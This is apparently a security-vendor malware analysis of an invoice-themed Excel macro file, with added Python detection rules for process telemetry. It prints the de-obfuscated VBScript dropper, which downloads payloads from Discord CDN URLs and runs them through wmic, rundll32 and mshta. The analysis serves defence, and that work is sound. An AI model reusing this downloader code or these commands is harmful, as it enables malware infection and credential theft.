The ASEC analysis team has recently discovered a malicious Excel file disguised as an invoice. The file is distributed as an e-mail attachment with a filename of the form Invoice-[number]_date.xlsb. The following is the malicious e-mail being distributed in Korea.
Upon opening the Excel file, editing is restricted and the user is prompted to click the image inside the file (see figure below).
Because the macro is assigned to this image, the user must click the image for the macro to run and perform its malicious behavior. The Macro1 sheet is hidden, and the numerous formulas are split across different cells within that sheet (see figure 4).
When the user clicks the image, the message shown in the figure below appears. The malicious behavior is triggered whether the user clicks OK or the close button.
The executed macro creates the file excel.rtf in the %APPDATA%\Microsoft\Excel\XLSTART folder and runs it with the command wmic process call create 'mshta %APPDATA%\Microsoft\Excel\XLSTART\excel.rtf'.
The excel.rtf file is an HTML file with several comments inserted, and it carries the malicious VBScript in a form that users cannot easily recognize. The following is the script from the de-obfuscated excel.rtf file.
<!DOCTYPE html>
<html>
<head>
---omitted---
<script type="text/vbscript" LANGUAGE="VBScript" >
Set hRpLar = CreateObject("Wscript.Shell")
' Compare %LOGONSERVER% (backslashes stripped) with %USERDOMAIN%
fpCHuctA = Replace(hRpLar.expandenvironmentstrings("%LOGONSERVER%"), CHR(92), "")
RBfOKtU = hRpLar.expandenvironmentstrings("%USERDOMAIN%")
If LCase(fpCHuctA) <> LCase(RBfOKtU) Then
    For Each WvpdWK in Array("https://cdn.discordapp.com/attachments/899633354561970258/899633408437813278/8_GrooveAudio.dll", _
                             "https://cdn.discordapp.com/attachments/899633354561970258/899633406822977536/7_docprop.dll", _
                             "https://cdn.discordapp.com/attachments/899633354561970258/899633425420546098/5_System.dll")
        Set UWXaoFp = CreateObject("Scripting.FileSystemObject")
        If Not UWXaoFp.FileExists("C:\\ProgramData\spprgrss.png") Then
            ---omitted---
            ' Save the downloaded payload to ProgramData as spprgrss.png
            With FiTmVH
                .type = 1
                .open
                .write djGHweg.responseBody
                .savetofile "C:\\ProgramData\spprgrss.png", 2
                .close
            End With
            ' Run it via wmic -> rundll32, calling the export BrandMe
            With CreateObject("Wscript.Shell")
                .Exec("wmic process call create " & Chr(34) & "rundll32.exe C:\\ProgramData\spprgrss.png BrandMe" & Chr(34))
            End With
---omitted---
The script contains code that compares the values of the %LOGONSERVER% and %USERDOMAIN% environment variables. For normal users these two values are the same, so the download does not start. The malware thus appears to target users in an AD (Active Directory) environment.
If the values of %LOGONSERVER% and %USERDOMAIN% differ, an additional malicious file is downloaded. The downloaded file is saved as spprgrss.png in the ProgramData folder and executed via wmic process call create "rundll32.exe C:\\ProgramData\spprgrss.png BrandMe".
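As an added example (not code from the ASEC post), the following Python rules flag the three observable steps of the chain described above in process-creation telemetry: Excel spawning wmic process call create, mshta running a non-.hta file from XLSTART, and rundll32 loading a non-DLL module (.png) from ProgramData. The event records, user name and benign look-alike command lines are constructed samples.

```python
from __future__ import annotations
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (not real telemetry) modelled on the chain:
# Excel -> wmic -> mshta excel.rtf, then wmic -> rundll32 spprgrss.png, plus two benign look-alikes.
SAMPLE_EVENTS = [
    {"parent": "EXCEL.EXE", "image": "WMIC.exe",
     "cmdline": r'wmic process call create "mshta C:\Users\u\AppData\Roaming\Microsoft\Excel\XLSTART\excel.rtf"'},
    {"parent": "WmiPrvSE.exe", "image": "mshta.exe",
     "cmdline": r"mshta C:\Users\u\AppData\Roaming\Microsoft\Excel\XLSTART\excel.rtf"},
    {"parent": "WmiPrvSE.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\spprgrss.png BrandMe"},
    {"parent": "explorer.exe", "image": "mshta.exe",           # benign: a real .hta
     "cmdline": r'mshta "C:\Program Files\Vendor\setup.hta"'},
    {"parent": "svchost.exe", "image": "rundll32.exe",         # benign: a real .dll
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# First argument after the binary name: either a quoted path or a bare token.
_FIRST_ARG = re.compile(r'^\S+\s+(?:"([^"]+)"|(\S+))')

def first_arg_extension(cmdline: str) -> str:
    """Lower-cased extension of the first argument path ('' if absent); drops a ',Entry' suffix."""
    m = _FIRST_ARG.match(cmdline.strip())
    if not m:
        return ""
    path = (m.group(1) or m.group(2)).split(",")[0]
    return PureWindowsPath(path).suffix.lower()

def classify(event: dict) -> list[str]:
    """Apply three rules derived from the observed chain and return the names that fire."""
    hits = []
    image, parent = event["image"].lower(), event["parent"].lower()
    cmd = event["cmdline"]
    lowered = cmd.lower()
    # Rule 1: an Office process using 'wmic process call create' to launch a script host.
    if image == "wmic.exe" and parent in OFFICE_PARENTS and "process call create" in lowered \
            and any(tool in lowered for tool in ("mshta", "rundll32", "powershell")):
        hits.append("office_wmic_process_create")
    # Rule 2: mshta executing a file whose extension is not .hta (here excel.rtf from XLSTART).
    if image == "mshta.exe" and first_arg_extension(cmd) not in ("", ".hta"):
        hits.append("mshta_non_hta_script")
    # Rule 3: rundll32 loading a non-.dll module (here a .png) out of ProgramData.
    if image == "rundll32.exe" and first_arg_extension(cmd) != ".dll" and "\\programdata\\" in lowered:
        hits.append("rundll32_non_dll_from_programdata")
    return hits

def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map each event index to the rules it triggered; events with no hits are omitted."""
    return {i: hits for i, e in enumerate(events) if (hits := classify(e))}
```

Running scan(SAMPLE_EVENTS) flags the first three events, one rule each, and leaves the two benign look-alikes untouched.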
The following are the download URLs found in the script.
Because the URLs above no longer work, the additional files cannot be downloaded. It is assumed, however, that they are banking malware such as Dridex.
In addition to Excel files that contain VBA macros, Excel files that use formula macros in this way continue to be discovered. As always, users must refrain from opening e-mail attachments from unknown senders, and should take care that malicious macros included in a file are not executed automatically.
AhnLab's anti-malware product, V3, detects and blocks the malware using the aliases below.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.